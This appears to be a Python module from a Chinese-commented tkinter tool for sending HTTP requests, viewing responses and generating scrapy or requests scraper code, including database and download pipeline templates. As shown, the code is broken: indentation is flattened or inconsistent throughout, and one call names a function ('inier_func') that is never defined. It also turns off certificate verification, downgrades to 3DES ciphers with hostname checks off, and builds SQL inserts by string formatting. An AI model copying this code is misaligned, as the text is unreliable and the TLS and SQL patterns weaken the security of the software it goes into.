lab2.pack(side=tkinter.LEFT)
btn1 = Button(temp_fr0, text='显示/隐藏配置', command=switch_show)
btn1.pack(side=tkinter.RIGHT)
# btn6 = Button(temp_fr0, text='生成[requests]代码', command=test_code)
# btn6.pack(side=tkinter.RIGHT)
# btn7 = Button(temp_fr0, text='生成[scrapy]代码', command=scrapy_code)
# btn7.pack(side=tkinter.RIGHT)
# btn8 = Button(temp_fr0, text='生成[urllib]代码', command=urllib_code)
# btn8.pack(side=tkinter.RIGHT)
btn9 = Button(temp_fr0, text='选择生成代码', command=_select_create_code)
btn9.pack(side=tkinter.RIGHT)
def _swich_encd(*a):
s = ent1.get().strip()
if s == 'utf-8':
ent1.delete(0,tkinter.END)
ent1.insert(0,'gbk')
elif s == 'gbk':
ent1.delete(0,tkinter.END)
ent1.insert(0,'utf-8')
else:
ent1.delete(0,tkinter.END)
ent1.insert(0,'utf-8')
def _swich_quote(*a):
s = ent2.get().strip()
if s == 'yes':
ent2.delete(0,tkinter.END)
ent2.insert(0,'no')
elif s == 'no':
ent2.delete(0,tkinter.END)
ent2.insert(0,'yes')
else:
ent2.delete(0,tkinter.END)
ent2.insert(0,'yes')
ent1 = Entry(temp_fr0,width=6)
ent1.pack(side=tkinter.RIGHT)
btnurlencode = Button(temp_fr0, width=14, text='url中文编码格式', command=_swich_encd)
btnurlencode.pack(side=tkinter.RIGHT)
urlenc = (setting.get('urlenc') or 'utf-8') if setting is not None else 'utf-8'
ent1.insert(0, urlenc)
ent2 = Entry(temp_fr0,width=4)
ent2.pack(side=tkinter.RIGHT)
btnurlencode1 = Button(temp_fr0, width=18, text='url是否编码“+”符号', command=_swich_quote)
btnurlencode1.pack(side=tkinter.RIGHT)
qplus = (setting.get('qplus') or 'no') if setting is not None else 'no'
ent2.insert(0, qplus)
    proxy = None
    if setting and setting.get('proxy'):
        matched = re.findall(r'(\d+)\.(\d+)\.(\d+)\.(\d+):(\d+)', setting.get('proxy'))
        if matched:
            a, b, c, d, e = map(int, matched[0])
            if all(0 <= x <= 255 for x in (a, b, c, d)) and 0 <= e <= 65535:
                Label(temp_fr0, text='使用代理: {}'.format(setting.get('proxy'))).pack(side=tkinter.RIGHT)
                proxy = setting.get('proxy').strip()
            else:
                Label(temp_fr0, text='错误的代理: {}'.format(setting.get('proxy'))).pack(side=tkinter.RIGHT)
temp_fr1 = Frame(fr,highlightthickness=lin)
temp_fold_fr1 = Frame(temp_fr1)
lb1 = Label (temp_fold_fr1,text='HTML文本展示')
tx1 = Text (temp_fold_fr1,height=1,width=1,font=ft,wrap='none')
lb1.pack(side=tkinter.TOP)
tx1.pack(fill=tkinter.BOTH,expand=True,side=tkinter.TOP,padx=pdx,pady=pdy)
temp_fold_fr2 = Frame(temp_fr1)
temp_fold_fold_fr1 = Frame(temp_fold_fr2)
temp_fold_fold_fr2 = Frame(temp_fold_fr2)
lb2 = Label (temp_fold_fold_fr1,text='配置数据')
tx2 = Text (temp_fold_fold_fr1,height=1,width=1,font=ft)
lb2.pack(side=tkinter.TOP)
tx2.pack(fill=tkinter.BOTH,expand=True,side=tkinter.TOP,padx=pdx,pady=pdy)
lb3 = Label (temp_fold_fold_fr2,text='执行说明')
tx3 = Text (temp_fold_fold_fr2,height=1,width=1,font=ft)
lb3.pack(side=tkinter.TOP)
tx3.pack(fill=tkinter.BOTH,expand=True,side=tkinter.TOP,padx=pdx,pady=pdy)
temp_fold_fold_fr1.pack(fill=tkinter.BOTH,expand=True,side=tkinter.TOP)
temp_fold_fold_fr2.pack(fill=tkinter.BOTH,expand=True,side=tkinter.TOP)
temp_fold_fr1.pack(fill=tkinter.BOTH,expand=True,side=tkinter.LEFT)
# temp_fold_fr2.pack(fill=tkinter.BOTH,expand=True,side=tkinter.LEFT)
temp_fr1.pack(fill=tkinter.BOTH,expand=True,side=tkinter.TOP)
temp_fr2 = Frame(fr,highlightthickness=lin)
lb4 = Label (temp_fr2,text='解析内容[Esc 开启/关闭解析显示]')
tx4 = Text (temp_fr2,height=1,width=1,font=ft)
lb4.pack(side=tkinter.TOP)
tx4.pack(fill=tkinter.BOTH,expand=True,padx=pdx,pady=pdy)
#temp_fr2.pack(fill=tkinter.BOTH,expand=True,side=tkinter.BOTTOM)
frame_setting[fr] = {}
frame_setting[fr]['type'] = 'response'
    frame_setting[fr]['fr_setting'] = setting # needed later when generating code
    frame_setting[fr]['fr_html_content'] = tx1
    frame_setting[fr]['fr_local_set'] = tx2 # method type and config of the current parsing script
    frame_setting[fr]['fr_local_info'] = tx3 # an auxiliary text area for explanations
    frame_setting[fr]['fr_parse_info'] = tx4
    frame_setting[fr]['fr_temp2'] = temp_fr2 # Text frame for parse output; an outer frame is used so the Esc key can toggle this window
frame_setting[fr]['fr_urlenc'] = ent1
frame_setting[fr]['fr_qplus'] = ent2
    # normalize the response data into a single format
def format_content(content):
if type(content) is bytes:
try:
content = content.decode('utf-8')
typ = 'utf-8'
except:
try:
content = content.decode('gbk')
typ = 'gbk'
except:
content = content.decode('utf-8',errors='ignore')
typ = 'utf-8 ignore'
insert_txt(tx3, '解析格式:{}'.format(typ))
return typ,content
else:
einfo = 'type:{} is not in type:[bytes]'.format(type(content))
raise TypeError(einfo)
from urllib import request
from urllib.parse import quote, unquote, unquote_plus, quote_plus, urlencode
if qplus == 'yes':
_quote,_unquote = quote_plus,unquote_plus
elif qplus == 'no':
_quote,_unquote = quote,unquote
def quote_val(url, enc): return re.sub(r'([\?&][^=&]*=)([^&]*)', lambda i:i.group(1)+_quote(_unquote(i.group(2), encoding=enc), encoding=enc), url)
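    # Illustrative example (an assumption, not from the original code): with enc='utf-8'
    # and the plain quote/unquote pair (qplus == 'no'),
    #   quote_val('http://x/?q=%E4%B8%AD a', 'utf-8')  ->  'http://x/?q=%E4%B8%AD%20a'
    # i.e. each query value is unquoted and re-quoted while keys and the path are left untouched.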
def urllib_myget(url, headers, proxies):
r = request.Request(url, method='GET')
for k, v in headers.items():
            if k.lower() == 'accept-encoding': continue # urllib does not decompress responses automatically, so skip this header
r.add_header(k, v)
opener = request.build_opener(request.ProxyHandler(proxies))
return opener.open(r)
def urllib_mypost(url, headers, body, proxies):
r = request.Request(url, method='POST')
for k, v in headers.items():
            if k.lower() == 'accept-encoding': continue # urllib does not decompress responses automatically, so skip this header
r.add_header(k, v)
opener = request.build_opener(request.ProxyHandler(proxies))
return opener.open(r, data=body)
proxies = {'http':'http://{}'.format(proxy), 'https':'http://{}'.format(proxy)} if proxy else None
def _request(method,url,headers,body):
# from .tab import dprint
# dprint(requests)
        if requests is not None and requests.__dict__.get('get'):
rurl = quote_val(_unquote(url, encoding=urlenc), enc=urlenc)
if method == 'GET':
s = requests.get(rurl,headers=headers,verify=False,proxies=proxies)
tp,content = format_content(s.content)
elif method == 'POST':
s = requests.post(rurl,headers=headers,data=body,verify=False,proxies=proxies)
tp,content = format_content(s.content)
else:
            # fallback request path: even if requests is unavailable, the send flow can still complete via urllib
url = quote_val(_unquote(url, encoding=urlenc), enc=urlenc)
if method == 'GET':
s = urllib_myget(url, headers, proxies)
tp, content = format_content(s.read())
elif method == 'POST':
body = urlencode(body).encode('utf-8') if isinstance(body, dict) else body
s = urllib_mypost(url, headers, body, proxies)
tp, content = format_content(s.read())
return tp, content
def _handle_dh_key_too_small():
try:
requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
requests.packages.urllib3.contrib.pyopenssl.DEFAULT_SSL_CIPHER_LIST += ':HIGH:!DH:!aNULL'
except AttributeError:
pass
import ssl
ssl._DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
    # Compatibility with legacy 3DES transport (dropped from newer standards as insecure, but some servers still require it)
_bak_init_poolmanager = requests.adapters.HTTPAdapter.init_poolmanager
_bak_proxy_manager_for = requests.adapters.HTTPAdapter.proxy_manager_for
def create_ssl_context():
import ssl
ctx = ssl.create_default_context()
ctx.set_ciphers( 'ECDH+3DES:DH+3DES:RSA+3DES:!aNULL:!eNULL:!MD5' )
if getattr(ctx, 'check_hostname', None) is not None:
ctx.check_hostname = False
return ctx
def init_poolmanager(self, *args, **kwargs):
kwargs['ssl_context'] = create_ssl_context()
return _bak_init_poolmanager(self, *args, **kwargs)
def proxy_manager_for(self, *args, **kwargs):
kwargs['ssl_context'] = create_ssl_context()
return _bak_proxy_manager_for(self, *args, **kwargs)
def _handle_3des_drop_out_stand():
requests.adapters.HTTPAdapter.init_poolmanager = init_poolmanager
requests.adapters.HTTPAdapter.proxy_manager_for = proxy_manager_for
def _unhook_handle_3des_drop_out_stand():
requests.adapters.HTTPAdapter.init_poolmanager = _bak_init_poolmanager
requests.adapters.HTTPAdapter.proxy_manager_for = _bak_proxy_manager_for
tp = None
extra = []
import queue
Q = queue.Queue()
    # Run the request in a separate thread so the UI does not freeze.
    def req_in_thread():
        nonlocal tp, extra, fr, Q
        def inner_func():
nonlocal tp, extra, fr
if setting is not None:
method = setting.get('method')
url = setting.get('url')
headers = setting.get('headers')
body = setting.get('body')
try:
tp, content = _request(method,url,headers,body)
except:
einfo = traceback.format_exc()
if 'dh key too small' in einfo:
extra.append('dh key too small')
_handle_dh_key_too_small()
tp, content = _request(method,url,headers,body)
elif '''SSLError("bad handshake: SysCallError(-1, 'Unexpected EOF')",)''' in einfo:
extra.append('3des drop out stand')
_handle_3des_drop_out_stand()
tp, content = _request(method,url,headers,body)
_unhook_handle_3des_drop_out_stand()
else:
tkinter.messagebox.showinfo('Error',einfo)
Q.put(["请求失败", einfo])
raise
return content
Q.put(["请求成功", inier_func()])
frame_setting[fr]['fr_parse_type'] = tp
frame_setting[fr]['fr_extra'] = extra
    threading.Thread(target=req_in_thread).start()
def loop_in_tkinter():
nonlocal Q, tx1
from .tab import nb
while Q.qsize():
try:
lab2['text'], content = Q.get_nowait()
insert_txt(tx1, content)
except queue.Empty:
pass
nb.after(200, loop_in_tkinter)
loop_in_tkinter()
# tp = None
# extra = []
# if setting is not None:
# method = setting.get('method')
# url = setting.get('url')
# headers = setting.get('headers')
# body = setting.get('body')
# try:
# tp, content = _request(method,url,headers,body)
# except:
# einfo = traceback.format_exc()
# if 'dh key too small' in einfo:
# extra.append('dh key too small')
# _handle_dh_key_too_small()
# tp, content = _request(method,url,headers,body)
# else:
# tkinter.messagebox.showinfo('Error',einfo)
# raise
# # insert_txt(tx1, traceback.format_exc())
# frame_setting[fr]['fr_parse_type'] = tp
# frame_setting[fr]['fr_extra'] = extra
return fr
# For now, try hooking the execution status of functions with the approach below.
# It still has some gaps; leave it like this and complete it later.
# Originally this clumsy approach was used because I had not yet figured out how to handle threading with tkinter.
# Now it is clear: every tkinter widget must be driven from the main thread; this can be done with a function that keeps re-scheduling itself, and the key is the after() call.
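# A standalone sketch of that pattern (an assumption-level example, independent of this
# tool's widgets): a worker thread pushes results into a queue.Queue, and the main
# thread drains it from a callback that keeps re-scheduling itself with widget.after().
def _demo_after_polling():  # illustration only; never called by the tool
    win = tkinter.Tk()
    out = tkinter.Text(win)
    out.pack()
    q = queue.Queue()
    def worker():
        q.put('work finished\n')        # only the queue is touched off the main thread
    def poll():
        while q.qsize():
            try:
                out.insert(tkinter.END, q.get_nowait())
            except queue.Empty:
                pass
        win.after(200, poll)            # keep re-scheduling on the tkinter main loop
    threading.Thread(target=worker).start()
    poll()
    win.mainloop()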
import sys
__org_stdout__ = sys.stdout
__org_stderr__ = sys.stderr
# class stdhooker:
# def __init__(self, hook=None, style=None):
# if hook.lower() == 'stdout':
# self.__org_func__ = __org_stdout__
# elif hook.lower() == 'stderr':
# self.__org_func__ = __org_stderr__
# else:
# raise 'stdhooker init error'
# self.cache = ''
# self.style = style
# self.predk = {}
# def write(self,text):
# self.logtx = get_tx()
# if self.logtx not in self.predk:
# self.predk[self.logtx] = 0
# self.cache += text
# if '\n' in self.cache:
# _text = self.cache.rsplit('\n',1)
# self.cache = '' if len(_text) == 1 else _text[1]
# _text_ = _text[0] + '\n'
# if self.logtx:
# try:
# self.logtx.insert(tkinter.END, _text_)
# except:
# self.logtx.insert(tkinter.END, re.sub('[\uD800-\uDBFF][\uDC00-\uDFFF]|[\U00010000-\U0010ffff]','',_text_))
# # self.logtx.insert(tkinter.END, _text_)
# self.logtx.see(tkinter.END)
# self.logtx.update()
# def flush(self):
# try:
# self.__org_func__.flush()
# except:
# pass
# def get_tx():
# for i in inspect.stack():
# if '__very_unique_cd__' in i[0].f_locals:
# return i[0].f_locals['cd']
# sys.stdout = stdhooker('stdout',style='normal')
# code generation lives here for now
def code_window(setting=None):
fr = Frame()
ft = Font(family='Consolas',size=10)
if setting.get('type') == 'request':
va,prox = setting.get('fr_proxy')
proxy = prox.get().strip() if va.get() else None
if setting.get('type') == 'response':
proxy = setting.get('fr_setting').get('proxy')
if proxy and setting.get('code_string'):
rep = "None # {'http':'http://127.0.0.1:8888', 'https':'http://127.0.0.1:8888'}"
rpl = "{'http':'http://" +proxy+ "', 'https':'http://" +proxy+ "'}"
setting['code_string'] = setting['code_string'].replace(rep, rpl)
def _execute_code(*a):
from .tab import execute_code
execute_code()
def save_script_in_desktop(*a):
name = askstring('脚本名','请输入脚本文件名,尽量小写无空格。')
if not name: return
if not name.endswith('.py'): name += '.py'
        desktop_script = os.path.join(os.path.expanduser("~"), 'Desktop', name)
if not os.path.isfile(desktop_script):
with open(desktop_script, 'w', encoding='utf-8') as f:
f.write(tx.get(0.,tkinter.END))
else:
tkinter.messagebox.showwarning('脚本已存在','脚本已存在')
tframe = Frame(fr)
tframe.pack(side=tkinter.TOP)
btn1 = Button(tframe, text='保存脚本到桌面', command=save_script_in_desktop)
btn1.pack(side=tkinter.LEFT)
btn2 = Button(tframe, text='执行代码 [Alt+v]', command=_execute_code)
btn2.pack(side=tkinter.LEFT)
tx = Text(fr,height=1,width=1,font=ft)
cs = setting.get('code_string')
if cs:
tx.delete(0.,tkinter.END)
tx.insert(0.,cs)
tx.pack(fill=tkinter.BOTH,expand=True,padx=pdx,pady=pdy)
temp_fr2 = Frame(fr,highlightthickness=lin)
lb = Label (temp_fr2,text='执行结果[Esc 显示/隐藏执行结果]')
cd = Text (temp_fr2,height=1,width=1,font=ft)
lb.pack(side=tkinter.TOP)
cd.pack(fill=tkinter.BOTH,expand=True,padx=pdx,pady=pdy)
    # Getting threads to play nicely with tkinter is a bit tiring.
    import queue
    Q = queue.Queue() # carries printed output back to the UI
    S = queue.Queue() # carries the script text to the worker
    def execute_func_window():
        # Important for the extra thread: never touch any tkinter object here.
        # Always hand data over through the Queues; the window drives its own self-rescheduling loop.
nonlocal Q, S
Q.put('V|GETSCRIPT')
cs = S.get()
td = tempfile.mkdtemp()
tf = os.path.join(td,'temp.py')
with open(tf,'w',encoding='utf-8') as f:
f.write(cs)
s = sys.executable
s = s + ' ' + tf
import subprocess
p = subprocess.Popen(s, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, bufsize=1, encoding='utf-8')
Q.put('V|DELETE')
Q.put('============================== start ==============================\n')
for line in iter(p.stdout.readline, ''):
if line:
Q.put(line)
else:
break
Q.put('============================== end ==============================')
p.wait()
p.stdout.close()
shutil.rmtree(td)
def loop_in_tkinter():
__very_unique_cd__ = None
nonlocal cd, Q, S
from .tab import nb
c = []
while Q.qsize():
try:
i = Q.get_nowait()
if i == 'V|DELETE':
cd.delete(0., tkinter.END)
elif i == 'V|GETSCRIPT':
cs = tx.get(0.,tkinter.END)
S.put(cs)
else:
try:
cd.insert(tkinter.END, i)
except:
cd.insert(tkinter.END, re.sub('[\uD800-\uDBFF][\uDC00-\uDFFF]|[\U00010000-\U0010ffff]','',i))
cd.see(tkinter.END)
cd.update()
except queue.Empty:
pass
nb.after(200, loop_in_tkinter)
loop_in_tkinter()
def execute_func():
threading.Thread(target=execute_func_window).start()
frame_setting[fr] = {}
frame_setting[fr]['type'] = 'code'
frame_setting[fr]['execute_func'] = execute_func
    frame_setting[fr]['fr_temp2'] = temp_fr2 # code-execution frame; the Esc key is hooked to show/hide this window
try:
from idlelib.colorizer import ColorDelegator
from idlelib.percolator import Percolator
p = ColorDelegator()
Percolator(tx).insertfilter(p)
except:
traceback.print_exc()
return fr
# the "post-verification code" feature is shelved for now
post_verification_model = r"""
'''
# [后验证代码模板]
# 只需在正常请求前加上下面两段便可处理重验证的操作
# 该重验证包含了,原始请求的重新提交以及验证次数的接口暴露
# 并且加了这一段验证代码之后你只需要对验证更新的部分修改即可。
# 使用时只需要修改两处
# 1. 修改后验证请求的信息的请求信息
# 2. 修改后验证的更新请求配置的信息(通常更新cookie,已有基本模板)
def parse(self, response):
def revalidate(response):
times = response.meta.get('_revalidate_times') or 0
# 重验次数,为了测试,这里使用的条件是,重验次数少于2则直接重验
# 几乎就等于无条件重验证两次,在实际情况下请注意验证条件的编写
if times >= 2:
return True
if not revalidate(response):
# ============ 请修改此处的验证请求信息 =============
# 这里只需要传入重验证需要请求的信息即可,会自动重验证和重新请求本次验证失败的请求
rurl = 'https://www.baidu.com/'
rheaders = {}
rbody = None # body为None则验证请求为get,否则为post
yield self.revalidate_pack(response, rurl, rheaders, rbody)
return
# 后续是正常的解析操作
'''
def revalidate_pack(self, response, rurl=None, rheaders=None, rbody=None):
def mk_revalidate_request(_plusmeta):
method = 'GET' if rbody is None else 'POST'
meta = {}
meta['_plusmeta'] = _plusmeta
r = Request(
rurl,
method = method,
headers = rheaders,
body = rbody,
callback = self.revalidate_parse,
meta = meta,
dont_filter = True,
)
return r
_plusmeta = dict(
url = response.request.url,
headers = response.request.headers.to_unicode_dict(),
body = response.request.body.decode(),
method = response.request.method,
meta = response.request.meta,
cbname = response.request.callback.__name__,
)
return mk_revalidate_request(_plusmeta)
def revalidate_parse(self, response):
'''
验证请求结束,返回验证信息则更新一些信息,重新对原来未验证的请求进行验证
有时是通过 set-cookie 来实现更新 cookie 的操作,所以这里的 cookie 需要考虑更新的操作。
可以通过 response.headers.to_unicode_dict() 将返回的headers里面的 key value 转换成字符串
这样操作会少一些处理 bytes 类型的麻烦。
'''
def update(_plusmeta):
# ============ 请修改此处的验证跟新 =============
# 一般的后验证通常会在这里对 _plusmeta 中的 cookie 更新,由于to_unicode_dict函数的关系
# 所有的key都是小写,所以不用担心大小写问题,这里给了一个简单的小模板,如需更多功能请自行修改
# 这里也可以更新一些 self 的参数,将验证进行持久化
newcookie = response.headers.to_unicode_dict().get('set-cookie')
if newcookie:
_plusmeta['headers']['cookie'] = newcookie
_plusmeta['meta']['_revalidate_times'] = (_plusmeta['meta'].get('_revalidate_times') or 0) + 1
return _plusmeta
_plusmeta = update(response.meta['_plusmeta'])
url = _plusmeta['url']
method = _plusmeta['method']
headers = _plusmeta['headers']
body = _plusmeta['body']
meta = _plusmeta['meta']
cbname = _plusmeta['cbname']
r = Request(
url,
method = method,
headers = headers,
body = body,
callback = getattr(self, cbname),
meta = meta,
dont_filter = True,
)
yield r
"""
single_script_comment_part1 = '''
# 工具作者有时会偏向将某些临时生成的文件放到固定地址(例如桌面),统一管理,便于工作
# 若使用相对路径存放文件,则无需添加 file:/// 的前缀
desktoppath = os.path.join(os.path.expanduser("~"),'Desktop') # 获取桌面地址的通用代码
filename = 'file:///' + os.path.join(desktoppath, filename) # 使用绝对地址时存文件需增加前缀,注意
jobdir = os.path.join(desktoppath, jobdir)
'''.strip('\n')
_pyinstaller_scrapy = '--add-data "$sysexec\\Lib\\site-packages\\scrapy;scrapy" --add-data "$sysexec\\Lib\\email;email" --add-data "$sysexec\\Lib\\site-packages\\twisted;twisted" --add-data "$sysexec\\Lib\\site-packages\\queuelib;queuelib" --add-data "$sysexec\\Lib\\sqlite3;sqlite3" --add-binary "$sysexec\\DLLs\\_sqlite3.pyd;." --add-binary "$sysexec\\DLLs\\sqlite3.dll;." --exclude-module numpy --exclude-module scipy --exclude-module matplotlib --exclude-module PyQt5 --noupx'
_pyinstaller_scrapy = _pyinstaller_scrapy.replace('$sysexec', os.path.dirname(sys.executable))
single_script_comment_part2 = """
# 基础中间件介绍
# 通过实例动态增加中间件(解耦了之前只能通过配置中间件字符串),方便单脚本实现增加中间件功能,例如数据库存储方面的内容。
# 便于单脚本利用别人的中间件。(将别人的中间件脚本粘贴进该脚本,实例化添加即可。示例如下,解开注释到 #(1) 即可测试。)
# class VPipeline(object):
# def process_item(self, item, spider):
# print('\\n==== 这里是动态增加的“下载中间件”部分 ====\\n')
# return item
# for i in p.crawlers: i.engine.scraper.itemproc._add_middleware(VPipeline()) #(1)
# for i in p.crawlers: i.engine.scraper.spidermw._add_middleware(...) #(2) 这里的...需要一个对应的中间件对象
# for i in p.crawlers: i.engine.downloader.middleware._add_middleware(...) #(3) 这里的...需要一个对应的中间件对象
#1) 通过对象动态增加 itemmiddlewares,目前仅在数据管道部分这种处理方式比较常用(因默认item中间件为空,不会被默认配置影响)
#2) 通过对象动态增加 spidermiddlewares # i.engine.scraper.spidermw.middlewares # 当前全部“爬虫中间件”
#3) 通过对象动态增加 downloadermiddlewares # i.engine.downloader.middleware.middlewares # 当前全部“下载中间件”
#*) 注意: 2,3两种中间件的动态增加不常用。因 p.crawl 函数执行后就已初始化默认中间件顺序。新的中间件只能“后添加”,缺乏灵活。
# 【图片下载】 中间件介绍
# 图片相关的文件下载中间件的添加,注意:图片相关的资源需要绑定 spider 以及 crawler。示例如下。
# 在一般的脚本 item['src'] 中添加字符串下载地址即可,一个 item 一个字符串下载地址,便于管理。详细阅读下面代码。
# 解开下面的代码块即可使用该功能
# import logging, hashlib
# from scrapy.pipelines.images import ImagesPipeline
# from scrapy.exceptions import DropItem
# class VImagePipeline(ImagesPipeline):
# def get_media_requests(self, item, info):
# yield Request(item['src'], meta=item)
# def file_path(self, request, response=None, info=None):
# url = request if not isinstance(request, Request) else request.url
# image_name = request.meta.get('image_name') # 使用 item中的 image_name 字段作为文件名进行存储,没有该字段则使用 url的 md5作为文件名存储
# image_name = re.sub(r'[/\\\\:\\*"<>\\|\\?]', '_', image_name).strip()[:80] if image_name else hashlib.md5(url.encode()).hexdigest()
# return '%s.jpg' % image_name # 生成的图片文件名字,此处可增加多级分类路径(路径不存在则自动创建),使用 image_name 请注意重名可能性。
# def item_completed(self, results, item, info): # 判断下载是否成功
# k, v = results[0]
# if not k: logging.info('download fail {}'.format(item))
# else: logging.info('download success {}'.format(item))
# item['image_download_stat'] = 'success' if k else 'fail'
# item['image_path'] = v['path'] if k else None # 保留文件名地址
# return item
# for i in p.crawlers:
# vimage = VImagePipeline('./image',settings=i.settings) # 生成的文件地址,默认跟随脚本路径下生成的一个 image文件夹
# vimage.spiderinfo = vimage.SpiderInfo(i.spider)
# vimage.crawler = i
# i.engine.scraper.itemproc._add_middleware(vimage)
# 【数据库存储】 中间件介绍
# 当你需要直接将数据传入数据库的时候只需要在 item里面加一个字段: item['__mysql__'] = __mysql__
# 代码片如下:
# d['__mysql__'] = {
# 'host':'127.0.0.1', # str 【可选】 (默认 'localhost')
# 'port':3306 , # int 【可选】 (默认 3306)
# 'user':'user', # str 该配置是必须的
# 'password':'mypass', # str 该配置是必须的
# 'table':'mytable', # str 该配置是必须的(如果数据库内没有该表则会自动创建)注意!创建后的表结构不可改变。
# 'db':'mydb', # str 【可选】 (默认vrequest)(如果没有则自动创建)
# }
# 这个字段里面需要详细描述需要连接的数据库以及需要传入的表的名字,
# 注意,这里会根据 __mysql__ 的值的 hash 进行数据库连接池的创建,不同配置使用不同连接池,优化连接
# 之所以使用这样的接口处理是因为,这样可以使得一个任务能根据配置写入不同的数据库,非常方便
# 解开下面的代码块即可使用该功能
# import hmac, logging, traceback
# from twisted.enterprise import adbapi
# class VMySQLPipeline(object):
# dbn = {}
# def process_item(self, item, spider):
# mysql_config = item.pop('__mysql__', None) # 存储时自动删除配置
# if mysql_config and item:
# if type(mysql_config) is dict:
# table = mysql_config.pop('table', None)
# db = mysql_config.get('db', None) or 'vrequest'
# mysql_config.setdefault('charset','utf8mb4')
# mysql_config.setdefault('db', db)
# dbk = hmac.new(b'',json.dumps(mysql_config, sort_keys=True).encode(),'md5').hexdigest()
# if dbk not in self.dbn:
# self.dbn[dbk] = adbapi.ConnectionPool('pymysql', **mysql_config)
# self.init_database(self.dbn[dbk], mysql_config, db, table, item)
# self.dbn[dbk].runInteraction(self.insert_item, db, table, item)
# return item
# else:
# raise TypeError('Unable Parse mysql_config type:{}'.format(type(mysql_config)))
# else:
# return item
# def insert_item(self, conn, db, table, item):
# table_sql = ''.join(["'{}',".format(json.dumps(v, ensure_ascii=False).replace("'","\\\\'")) for k,v in item.items()])
# insert_sql = 'INSERT INTO `{}`.`{}` VALUES({})'.format(db, table, table_sql.strip(','))
# try:
# conn.execute(insert_sql)
# logging.info('insert sql success')
# except Exception as e:
# logging.info('insert sql fail: {}'.format(insert_sql))
# logging.error(traceback.format_exc())
# def init_database(self, pool, mysql_config, db, table, item):
# # 需要注意的是,在一些非常老的版本的mysql 里面并不支持 utf8mb4。这是 mysql 的设计缺陷,赶紧使用大于 5.5 版本的 mysql !
# # 创建db,创建表名,所有字段都以 MEDIUMTEXT 存储,用 json.dumps 保证了数据类型也能存储,后续取出时只需要每个值 json.loads 这样就能获取数据类型
# # 例如一个数字类型 123 -> json.dumps -> '123' -> json.loads -> 123,统一类型存储,取出时又能保证数据类型,这种处理会很方便
# # MEDIUMTEXT 最大能使用16M 的长度,所以对于一般的 html 文本也非常足够。如有自定义字段类型的需求,请注意修改该处。
# db, charset = mysql_config.pop('db'), mysql_config.get('charset')
# try:
# conn = pool.dbapi.connect(**mysql_config)
# cursor = conn.cursor()
# table_sql = ''.join(['`{}` MEDIUMTEXT NULL,'.format(str(k)) for k,v in item.items()])
# cursor.execute('Create Database If Not Exists {} Character Set {}'.format(db, charset))
# cursor.execute('Create Table If Not Exists `{}`.`{}` ({})'.format(db, table, table_sql.strip(',')))
# conn.commit(); cursor.close(); conn.close()
# except Exception as e:
# traceback.print_exc()
# for i in p.crawlers: i.engine.scraper.itemproc._add_middleware(VMySQLPipeline())
# 【视频下载】 中间件介绍
# 以下包含了比较主流的下载器的使用代码片,请任选一个进行使用。you-get 或 youtube-dl
# 如果存在一些 m3u8 的视频需要下载,那么建议下载 ffmpeg,并使用 youtube-dl 进行下载。
# ffmpeg如果没有配置环境变量则请将 ffmpeg_location 设置为 ffmpeg.exe 文件的路径即可。
# 解开下面的代码块即可使用该功能
# class VVideoPipeline(object):
# def process_item(self, item, spider):
# url = item['src']
# ### 【you-get】
# import you_get.common
# you_get.common.skip_existing_file_size_check = True # 防止发现重复视频时会强制要求输入“是否覆盖”,卡住程序,默认不覆盖
# you_get.common.any_download(url, output_dir='./video', merge=True, info_only=False)
# ### 【youtube-dl】
# # from youtube_dl import YoutubeDL
# # ytdl = YoutubeDL({'outtmpl': './video/%(title)s.%(ext)s', 'ffmpeg_location':None}) # 如果已配置ffmpeg环境则不用修改
# # info = ytdl.extract_info(url, download=True)
# return item
# for i in p.crawlers: i.engine.scraper.itemproc._add_middleware(VVideoPipeline())
# 如果使用 pyinstaller 打包 scrapy 脚本成为单个 exe,那也很方便
# 将下面的一行内容拼接到 “pyinstaller -F $你的scrapy单脚本.py ” 命令的后面就可以了。(这里为纯scrapy打包,若还有额外第三方库请按照类似方式添加)
# $pyinstaller_scrapy
# 注意,这里的打包默认去除最常见影响大小的库 numpy scipy matplotlib,如有需要引用请删除这里的部分 --exclude-module
""".strip('\n').replace('$pyinstaller_scrapy', _pyinstaller_scrapy)
_main_2_list_2_info_model = r'''
def mk_url_headers(d):
def quote_val(url): return re.sub(r'([\?&][^=&]*=)([^&]*)', lambda i:i.group(1)+quote_plus(unquote_plus(i.group(2))), url)
url = response.urljoin(d['href'])
url = quote_val(url)
headers = {
"accept-encoding": "gzip, deflate",
"accept-language": "zh-CN,zh;q=0.9",
"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36"
}
return url,headers
url,headers = mk_url_headers(d)
meta = {}
meta['proxy'] = self.proxy
meta['_plusmeta'] = {**_meta, **d} # keys word transfer
r = Request(
url,
headers = headers,
callback = self.parse_info,
meta = meta,
# method = 'POST', # if post is used, pls uncomment here and create the body parameter
# body = urlencode(body),
)
yield r
def parse_info(self, response):
d = response.meta.get('_plusmeta') or {}
d['someting1'] = 'pls fill in the fields collected on this page.'
d['someting2'] = 'pls fill in the fields collected on this page.'
d['someting3'] = 'pls fill in the fields collected on this page.'
print('------------------------------ split ------------------------------')
import pprint
pprint.pprint(d)
yield d
'''
_single_distributed = r'''# -*- coding: utf-8 -*-
def hook_to_scrapy_redis(namespace='default'):
import redis
from scrapy.http import Request
from scrapy.utils.python import to_unicode, to_native_str
from scrapy.utils.misc import load_object
def request_to_dict(request, spider=None):
if callable(request.callback): request.callback = _find_method(spider, request.callback)
if callable(request.errback): request.errback = _find_method(spider, request.errback)
d = {
'url': to_unicode(request.url), # urls should be safe (safe_string_url)
'callback': request.callback,
'errback': request.errback,
'method': request.method,
'headers': dict(request.headers),
'body': request.body,
'cookies': request.cookies,
'meta': request.meta,
'_encoding': request._encoding,
'priority': request.priority,
'dont_filter': request.dont_filter,
'flags': request.flags,
}
if type(request) is not Request:
d['_class'] = request.__module__ + '.' + request.__class__.__name__
return d
def request_from_dict(d, spider=None):
if d['callback'] and spider: d['callback'] = _get_method(spider, d['callback'])
if d['errback'] and spider: d['errback'] = _get_method(spider, d['errback'])
request_cls = load_object(d['_class']) if '_class' in d else Request
_cls = request_cls(
url=to_native_str(d['url']),
callback=d['callback'],
errback=d['errback'],
method=d['method'],
headers=d['headers'],
body=d['body'],
cookies=d['cookies'],
